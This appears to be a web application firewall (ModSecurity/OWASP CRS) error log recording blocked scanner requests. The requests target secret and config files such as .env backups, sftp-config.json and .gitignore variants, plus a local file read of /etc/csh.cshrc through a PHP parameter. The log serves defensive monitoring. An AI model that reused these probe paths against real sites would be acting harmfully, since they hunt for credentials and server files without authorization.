[Mon May 11 12:21:46.862743 2026] [security2:error] [pid 1256241:tid 1256248] [client 216.73.216.110:12309] ModSecurity: Warning. Matched phrase ".cshrc" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: .cshrc found within ARGS:filesrc: /etc/csh.cshrc"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agGtupkIEwRJMyDaV55ZWQAAAUI"]
[Mon May 11 12:21:46.864027 2026] [security2:error] [pid 1256241:tid 1256248] [client 216.73.216.110:12309] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agGtupkIEwRJMyDaV55ZWQAAAUI"]
[Mon May 11 12:21:46.963135 2026] [security2:error] [pid 1256241:tid 1256248] [client 216.73.216.110:12309] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGtupkIEwRJMyDaV55ZWQAAAUI"]
[Mon May 11 12:21:53.972731 2026] [security2:error] [pid 1254212:tid 1254235] [client 185.177.72.9:19450] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /staging/.env.bak20240101"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/staging/.env.bak20240101"] [unique_id "agGtwUYQeUtAPynIs6xjxgAAABU"]
[Mon May 11 12:21:53.973489 2026] [security2:error] [pid 1254212:tid 1254235] [client 185.177.72.9:19450] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/staging/.env.bak20240101"] [unique_id "agGtwUYQeUtAPynIs6xjxgAAABU"]
[Mon May 11 12:21:55.155758 2026] [security2:error] [pid 1254212:tid 1254235] [client 185.177.72.9:19450] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGtwUYQeUtAPynIs6xjxgAAABU"]
[Mon May 11 12:21:55.181006 2026] [security2:error] [pid 1256241:tid 1256262] [client 185.177.72.9:19458] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /staging/.env.bak20240101"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/staging/.env.bak20240101"] [unique_id "agGtw5kIEwRJMyDaV55ZawAAAVA"]
[Mon May 11 12:21:55.182350 2026] [security2:error] [pid 1256241:tid 1256262] [client 185.177.72.9:19458] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/staging/.env.bak20240101"] [unique_id "agGtw5kIEwRJMyDaV55ZawAAAVA"]
[Mon May 11 12:21:56.410348 2026] [security2:error] [pid 1256241:tid 1256262] [client 185.177.72.9:19458] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGtw5kIEwRJMyDaV55ZawAAAVA"]
[Mon May 11 12:22:03.844934 2026] [security2:error] [pid 1254328:tid 1254351] [client 185.177.72.9:5282] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /stats/.env.save.inactive"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/stats/.env.save.inactive"] [unique_id "agGty0Rdw2n9wv6Ai48S3AAAAJU"]
[Mon May 11 12:22:03.845714 2026] [security2:error] [pid 1254328:tid 1254351] [client 185.177.72.9:5282] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/stats/.env.save.inactive"] [unique_id "agGty0Rdw2n9wv6Ai48S3AAAAJU"]
[Mon May 11 12:22:05.018391 2026] [security2:error] [pid 1254328:tid 1254351] [client 185.177.72.9:5282] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGty0Rdw2n9wv6Ai48S3AAAAJU"]
[Mon May 11 12:22:05.047722 2026] [security2:error] [pid 1256241:tid 1256268] [client 185.177.72.9:5294] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /stats/.env.save.inactive"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/stats/.env.save.inactive"] [unique_id "agGtzZkIEwRJMyDaV55ZdwAAAVY"]
[Mon May 11 12:22:05.051890 2026] [security2:error] [pid 1256241:tid 1256268] [client 185.177.72.9:5294] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/stats/.env.save.inactive"] [unique_id "agGtzZkIEwRJMyDaV55ZdwAAAVY"]
[Mon May 11 12:22:06.261686 2026] [security2:error] [pid 1256241:tid 1256268] [client 185.177.72.9:5294] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGtzZkIEwRJMyDaV55ZdwAAAVY"]
[Mon May 11 12:22:08.722655 2026] [security2:error] [pid 1254328:tid 1254342] [client 185.177.72.9:5326] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /stats/sftp-config.json20240101"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/stats/sftp-config.json20240101"] [unique_id "agGt0ERdw2n9wv6Ai48S3wAAAIs"]
[Mon May 11 12:22:08.723326 2026] [security2:error] [pid 1254328:tid 1254342] [client 185.177.72.9:5326] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/stats/sftp-config.json20240101"] [unique_id "agGt0ERdw2n9wv6Ai48S3wAAAIs"]
[Mon May 11 12:22:09.897100 2026] [security2:error] [pid 1254328:tid 1254342] [client 185.177.72.9:5326] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGt0ERdw2n9wv6Ai48S3wAAAIs"]
[Mon May 11 12:22:09.924907 2026] [security2:error] [pid 1256241:tid 1256252] [client 185.177.72.9:5332] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /stats/sftp-config.json20240101"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/stats/sftp-config.json20240101"] [unique_id "agGt0ZkIEwRJMyDaV55ZfQAAAUY"]
[Mon May 11 12:22:09.925489 2026] [security2:error] [pid 1256241:tid 1256252] [client 185.177.72.9:5332] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/stats/sftp-config.json20240101"] [unique_id "agGt0ZkIEwRJMyDaV55ZfQAAAUY"]
[Mon May 11 12:22:11.162581 2026] [security2:error] [pid 1256241:tid 1256252] [client 185.177.72.9:5332] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGt0ZkIEwRJMyDaV55ZfQAAAUY"]
[Mon May 11 12:22:23.608763 2026] [security2:error] [pid 1254133:tid 1254154] [client 185.177.72.9:32900] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /svelte/.env.config.rc1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/svelte/.env.config.rc1"] [unique_id "agGt3xjZymfuKpjWXeiIEQAAANI"]
[Mon May 11 12:22:23.609266 2026] [security2:error] [pid 1254133:tid 1254154] [client 185.177.72.9:32900] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/svelte/.env.config.rc1"] [unique_id "agGt3xjZymfuKpjWXeiIEQAAANI"]
[Mon May 11 12:22:24.783812 2026] [security2:error] [pid 1254133:tid 1254154] [client 185.177.72.9:32900] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGt3xjZymfuKpjWXeiIEQAAANI"]
[Mon May 11 12:22:24.810450 2026] [security2:error] [pid 1256241:tid 1256257] [client 185.177.72.9:32916] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /svelte/.env.config.rc1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/svelte/.env.config.rc1"] [unique_id "agGt4JkIEwRJMyDaV55ZlgAAAUs"]
[Mon May 11 12:22:24.810892 2026] [security2:error] [pid 1256241:tid 1256257] [client 185.177.72.9:32916] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/svelte/.env.config.rc1"] [unique_id "agGt4JkIEwRJMyDaV55ZlgAAAUs"]
[Mon May 11 12:22:26.042266 2026] [security2:error] [pid 1256241:tid 1256257] [client 185.177.72.9:32916] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGt4JkIEwRJMyDaV55ZlgAAAUs"]
[Mon May 11 12:22:26.068998 2026] [security2:error] [pid 1254242:tid 1254250] [client 185.177.72.9:32928] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /svelte/.env.live.beta"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/svelte/.env.live.beta"] [unique_id "agGt4r4KNmD_mZ_vlf9DzwAAAEQ"]
[Mon May 11 12:22:26.070469 2026] [security2:error] [pid 1254242:tid 1254250] [client 185.177.72.9:32928] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/svelte/.env.live.beta"] [unique_id "agGt4r4KNmD_mZ_vlf9DzwAAAEQ"]
[Mon May 11 12:22:27.261054 2026] [security2:error] [pid 1254242:tid 1254250] [client 185.177.72.9:32928] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGt4r4KNmD_mZ_vlf9DzwAAAEQ"]
[Mon May 11 12:22:27.286263 2026] [security2:error] [pid 1254212:tid 1254232] [client 185.177.72.9:32942] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /svelte/.env.live.beta"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/svelte/.env.live.beta"] [unique_id "agGt40YQeUtAPynIs6xkHAAAABI"]
[Mon May 11 12:22:27.287497 2026] [security2:error] [pid 1254212:tid 1254232] [client 185.177.72.9:32942] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/svelte/.env.live.beta"] [unique_id "agGt40YQeUtAPynIs6xkHAAAABI"]
[Mon May 11 12:22:28.485547 2026] [security2:error] [pid 1254212:tid 1254232] [client 185.177.72.9:32942] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGt40YQeUtAPynIs6xkHAAAABI"]
[Mon May 11 12:22:41.032290 2026] [security2:error] [pid 1254179:tid 1254181] [client 185.177.72.9:59796] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.gitignore found within REQUEST_FILENAME: /symfony/.gitignore.beta"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/symfony/.gitignore.beta"] [unique_id "agGt8WS6k_SCYd1AVZq5bgAAAQA"]
[Mon May 11 12:22:41.032697 2026] [security2:error] [pid 1254179:tid 1254181] [client 185.177.72.9:59796] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/symfony/.gitignore.beta"] [unique_id "agGt8WS6k_SCYd1AVZq5bgAAAQA"]
[Mon May 11 12:22:42.203206 2026] [security2:error] [pid 1254179:tid 1254181] [client 185.177.72.9:59796] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGt8WS6k_SCYd1AVZq5bgAAAQA"]
[Mon May 11 12:22:42.225835 2026] [security2:error] [pid 1254212:tid 1254224] [client 185.177.72.9:59798] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.gitignore found within REQUEST_FILENAME: /symfony/.gitignore.beta"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/symfony/.gitignore.beta"] [unique_id "agGt8kYQeUtAPynIs6xkKwAAAAo"]
[Mon May 11 12:22:42.226043 2026] [security2:error] [pid 1254212:tid 1254224] [client 185.177.72.9:59798] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/symfony/.gitignore.beta"] [unique_id "agGt8kYQeUtAPynIs6xkKwAAAAo"]
[Mon May 11 12:22:43.480536 2026] [security2:error] [pid 1254212:tid 1254224] [client 185.177.72.9:59798] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGt8kYQeUtAPynIs6xkKwAAAAo"]
